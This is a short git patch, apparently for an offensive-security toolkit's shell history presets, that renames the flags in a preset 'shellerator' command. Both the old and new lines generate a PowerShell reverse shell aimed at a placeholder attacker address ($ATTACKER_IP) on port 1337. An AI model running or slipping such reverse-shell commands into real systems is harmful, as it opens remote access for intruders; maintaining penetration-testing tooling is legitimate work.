From f66d604626a9b5ea3ff204e8369266fb8b8f1a32 Mon Sep 17 00:00:00 2001 From: y0no Date: Wed, 7 Dec 2022 16:32:40 +0100 Subject: [PATCH] Fix shellerator history --- sources/zsh/history.d/shellerator | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/sources/zsh/history.d/shellerator b/sources/zsh/history.d/shellerator index abeed6767..5c43c08b6 100644 --- a/sources/zsh/history.d/shellerator +++ b/sources/zsh/history.d/shellerator @@ -1,2 +1,2 @@ shellerator -shellerator --reverse-shell --ip "$ATTACKER_IP" --port 1337 --type powershell +shellerator --reverse-shell --lhost "$ATTACKER_IP" --lport 1337 --type powershell